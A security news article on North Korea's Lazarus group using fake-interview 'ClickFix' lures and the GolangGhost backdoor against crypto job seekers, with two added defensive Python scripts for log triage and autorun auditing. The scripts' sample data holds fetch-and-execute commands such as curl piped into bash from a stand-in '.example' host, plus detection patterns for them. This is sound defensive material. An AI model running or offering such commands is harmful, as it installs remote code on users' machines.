North Korean hackers adopt ClickFix attacks to target crypto firms
The notorious North Korean Lazarus hacking group has reportedly adopted 'ClickFix' tactics to deploy malware targeting job seekers in the cryptocurrency industry, particularly centralized finance (CeFi).
This development, reported by Sekoia, is seen as an evolution of the threat actor's 'Contagious Interview' campaign that similarly targets job seekers in the AI and cryptocurrency space.
ClickFix is a relatively new but increasingly common tactic in which threat actors display a fake error on a website or in a document, claiming there is a problem viewing the content. The page then prompts the user to "fix" the issue by copying a command (typically PowerShell, or a curl one-liner in a terminal) into a console; that command downloads and executes the malware. The victim, not an exploit, performs the execution step, which is why the lure works against fully patched systems.
Sekoia says that Lazarus impersonates numerous well-known companies in the latest campaign, including Coinbase, KuCoin, Kraken, Circle, Securitize, BlockFi, Tether, Robinhood, and Bybit, from which the North Korean threat actors recently stole a record $1.5 billion.
"By collecting data (i.e. JSON objects) included in all the fake interview websites we identified, we were able to determine which companies were unknowingly used as a lure for these fake interviews," explains Sekoia.
"Our analysis is based on 184 different invitations retrieved from fake interview websites. Among these invitations, we found 14 company names used to lure the victim into completing the application process."

Lazarus adopts ClickFix
In Contagious Interview, first documented in November 2023, Lazarus approaches targets on LinkedIn or X with employment opportunities.
It then uses software and coding test projects hosted on collaboration platforms such as GitHub and Bitbucket to trick targets into downloading and running malware loaders, which drop info-stealers.
Starting in February 2025, Sekoia says Lazarus has started using so-called 'ClickFake' campaigns that employ ClickFix tactics to achieve the self-infection step, with the earlier phases of the attack remaining the same.
However, the researchers note that Contagious Interview is still ongoing, suggesting the North Koreans may be evaluating the effectiveness of the two techniques by running them in parallel.
In the ClickFake attacks, Lazarus switched focus from targeting developers and coders to people holding non-technical roles in CeFi companies, such as business developers and marketing managers.
These people are invited to a remote interview by following a link to a legitimate-appearing site built in ReactJS, featuring contact forms, open-ended questions, and a request for a video introduction.
When the target attempts to record the video using their webcam, a fake error appears, claiming a driver issue is preventing camera access and generating instructions on how to overcome the problem.

Based on the browser's User-Agent, the site delivers OS-specific instructions, supporting either Windows or macOS.
The victims are instructed to run a curl command in CMD (Windows) or Terminal (macOS), which fetches and runs a Go-based backdoor named 'GolangGhost'. The backdoor establishes persistence via a registry modification on Windows and a LaunchAgent plist file on macOS.
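The infection chain above leaves a distinctive trace in process-creation telemetry: a user-opened shell (launched from explorer.exe or Terminal) spawning curl, followed within seconds by a binary executing from a temp directory, or curl output piped straight into a shell. The following triage script is an added example, not code from the article or from Sekoia; the log lines it parses are constructed, the simplified `timestamp|host|user|parent|image|command_line` format and the five-minute correlation window are my assumptions, and the domains are reserved `.example` names.

```python
"""Added example (not code from the article or from Sekoia): triage of
process-creation events for ClickFix-style "paste this into CMD/Terminal"
infections. The events below are constructed, not real telemetry."""
import re
from datetime import datetime, timedelta

# Constructed sample events: timestamp|host|user|parent_image|image|command_line
SAMPLE_LOG = """\
2025-03-28T10:02:11Z|WS01|alice|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\cmd.exe|cmd.exe
2025-03-28T10:02:40Z|WS01|alice|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\curl.exe|curl -k -o %TEMP%\\camdrv.zip https://cam-driver.example/fix.zip
2025-03-28T10:02:41Z|WS01|alice|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\tar.exe|tar -xf %TEMP%\\camdrv.zip -C %TEMP%
2025-03-28T10:02:42Z|WS01|alice|C:\\Windows\\System32\\cmd.exe|C:\\Users\\alice\\AppData\\Local\\Temp\\update.exe|%TEMP%\\update.exe
2025-03-28T10:05:03Z|MAC07|bob|/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal|/bin/zsh|-zsh
2025-03-28T10:05:30Z|MAC07|bob|/bin/zsh|/bin/bash|bash -c "curl -s https://cam-driver.example/fix.sh | bash"
2025-03-28T10:09:15Z|WS01|alice|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\curl.exe|curl https://api.example/health
2025-03-28T11:00:00Z|BUILD02|ci|/usr/bin/make|/usr/bin/curl|curl -sSfL -o deps.tar.gz https://registry.example/deps.tar.gz
"""

INTERACTIVE_LAUNCHERS = ("explorer.exe", "terminal", "iterm2")   # a human opened the shell
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "bash", "zsh", "sh"}
TEMP_DIR = re.compile(r"%TEMP%|\\AppData\\Local\\Temp\\|/tmp/|/private/tmp/|/var/folders/", re.I)
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|z)?sh\b", re.I)
CURL = re.compile(r"\bcurl(\.exe)?\b", re.I)
EXEC_WINDOW = timedelta(seconds=300)   # assumed: download-then-execute correlation window


def basename(path):
    return re.split(r"[\\/]", path)[-1].lower()


def parse_events(log):
    events = []
    for line in log.strip().splitlines():
        ts, host, user, parent, image, cmd = line.split("|", 5)
        events.append({"ts": datetime.fromisoformat(ts.replace("Z", "+00:00")),
                       "host": host, "user": user, "parent": parent,
                       "image": image, "cmd": cmd})
    return sorted(events, key=lambda e: e["ts"])


def triage(events):
    """Return findings for curl typed into a user-opened shell, escalated when
    the command pipes into a shell, writes to a temp dir, or is followed by a
    binary running from a temp dir on the same host."""
    interactive = set()     # (host, shell image) for shells launched from the desktop/Terminal
    last_download = {}      # host -> time of the most recent interactive curl
    findings = []
    for e in events:
        pb, ib = basename(e["parent"]), basename(e["image"])
        launched_by_user = any(k in pb for k in INTERACTIVE_LAUNCHERS)
        if ib in SHELLS and launched_by_user:
            interactive.add((e["host"], e["image"]))
        if not (launched_by_user or (e["host"], e["parent"]) in interactive):
            continue    # curl from build systems, scripts and services is out of scope here
        if CURL.search(e["cmd"]):
            last_download[e["host"]] = e["ts"]
            if PIPE_TO_SHELL.search(e["cmd"]):
                sev, why = "high", "curl output piped straight into a shell"
            elif TEMP_DIR.search(e["cmd"]):
                sev, why = "high", "curl writing into a temp directory"
            else:
                sev, why = "medium", "curl typed into an interactive shell"
        elif (TEMP_DIR.search(e["image"]) and e["host"] in last_download
              and e["ts"] - last_download[e["host"]] <= EXEC_WINDOW):
            sev, why = "high", "binary run from a temp directory shortly after an interactive curl"
        else:
            continue
        findings.append({"ts": e["ts"].isoformat(), "host": e["host"], "user": e["user"],
                         "severity": sev, "reason": why, "cmd": e["cmd"]})
    return findings


if __name__ == "__main__":
    for f in triage(parse_events(SAMPLE_LOG)):
        print(f"[{f['severity']:6}] {f['ts']} {f['host']}/{f['user']}: {f['reason']} :: {f['cmd']}")
```

The CI host's curl is ignored because its parent is `make`, not a user-opened shell; the analyst's `curl https://api.example/health` surfaces only at medium severity, while the `-o %TEMP%`, the temp-dir execution two seconds later, and the `| bash` on the Mac all score high. In a real deployment the parent-chain check should walk further up than one level, since the lure can just as easily ask for `bash -c` or `powershell -c` as for a bare curl.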

Once deployed, GolangGhost connects to its command and control (C2) server, registers the newly infected device with a unique machine ID, and waits for commands.
The malware can perform file operations and execute shell commands, steal Chrome cookies, browsing history, and stored passwords, and harvest system metadata.
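The article names the two persistence locations GolangGhost uses, a registry modification on Windows and a LaunchAgent plist on macOS, without describing the entries themselves. The audit below is an added example, not code from the article or from Sekoia: it parses constructed LaunchAgent plists and a constructed set of `HKCU\...\CurrentVersion\Run` values and flags entries that look like a dropped loader. The heuristics (interpreter wrappers, user-writable or hidden paths, network fetches at login) and all labels, paths and value names are my assumptions.

```python
"""Added example (not from the article or Sekoia): auditing the two autorun
locations the article names, Windows Run keys and macOS LaunchAgent plists.
Inputs are constructed; the scoring heuristics are assumptions, not IOCs."""
import plistlib
import re
import shlex

# Constructed LaunchAgent plists (labels and paths are invented).
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.backupagent</string>
  <key>Program</key><string>/Applications/Backup.app/Contents/MacOS/backupd</string>
  <key>RunAtLoad</key><true/>
</dict></plist>
"""
SUSPECT_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.camerafix</string>
  <key>ProgramArguments</key>
  <array><string>/bin/bash</string><string>-c</string><string>/Users/bob/.camdrv/update</string></array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>
"""
# Constructed Run-key values (value name -> command), as winreg.EnumValue would return them.
RUN_VALUES = {
    "ExampleUpdater": r'"C:\Program Files\Example\Updater.exe" /background',
    "CameraDriverFix": r"C:\Users\alice\AppData\Local\Temp\update.exe",
}

INTERPRETERS = {"bash", "sh", "zsh", "osascript", "python3", "curl", "cmd.exe",
                "powershell.exe", "wscript.exe", "mshta.exe", "rundll32.exe"}
USER_WRITABLE = re.compile(
    r"/tmp/|/private/tmp/|/var/folders/|/Users/[^/]+/(Downloads|\.[^/]+)/"
    r"|\\AppData\\Local\\Temp\\|\\Downloads\\|%TEMP%|%APPDATA%", re.I)


def basename(path):
    return re.split(r"[\\/]", path.strip('"'))[-1].lower()


def assess(program, args):
    """Return the reasons an autorun entry looks like a dropped loader (empty if none)."""
    reasons = []
    text = " ".join([program] + list(args))
    if basename(program) in INTERPRETERS:
        reasons.append("autorun entry is an interpreter wrapper: " + basename(program))
    if USER_WRITABLE.search(text):
        reasons.append("references a user-writable or hidden path")
    if re.search(r"https?://", text):
        reasons.append("fetches from the network at login")
    return reasons


def audit_launch_agent(plist_bytes):
    p = plistlib.loads(plist_bytes)
    argv = p.get("ProgramArguments") or [p.get("Program", "")]
    reasons = assess(argv[0], argv[1:])
    if reasons and p.get("RunAtLoad") and p.get("KeepAlive"):
        reasons.append("RunAtLoad+KeepAlive: relaunched by launchd whenever it exits")
    return {"label": p.get("Label"), "argv": argv, "reasons": reasons}


def audit_run_values(values):
    """values: {name: command} from HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run.
    On a live host enumerate them with winreg.OpenKey/EnumValue; here a constructed dict."""
    out = []
    for name, cmd in values.items():
        parts = shlex.split(cmd, posix=False)   # keep backslashes, honour quoted paths
        out.append({"name": name, "cmd": cmd, "reasons": assess(parts[0], parts[1:])})
    return out


if __name__ == "__main__":
    for plist in (BENIGN_PLIST, SUSPECT_PLIST):
        r = audit_launch_agent(plist)
        print(r["label"], "->", r["reasons"] or "clean")
    for r in audit_run_values(RUN_VALUES):
        print(r["name"], "->", r["reasons"] or "clean")
```

On macOS the files to feed `audit_launch_agent` live in `~/Library/LaunchAgents` and `/Library/LaunchAgents`; a `bash -c` wrapper pointing into a hidden directory under the user's home is the shape to look for, since a legitimately installed agent usually names its own binary under `/Applications` or `/Library`.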
As Lazarus diversifies its attack methods, potential targets must remain vigilant and stay up-to-date with the latest developments, consistently verifying interview invitations before downloading or executing anything on their systems.
Never paste and execute commands copied from a website into the Windows Command Prompt or macOS Terminal, especially if you do not fully understand what they do.
Sekoia has also shared YARA rules that organizations can use to detect and block ClickFake activity in their environments, as well as a complete list of the indicators of compromise associated with the latest Lazarus campaigns.
source: BleepingComputer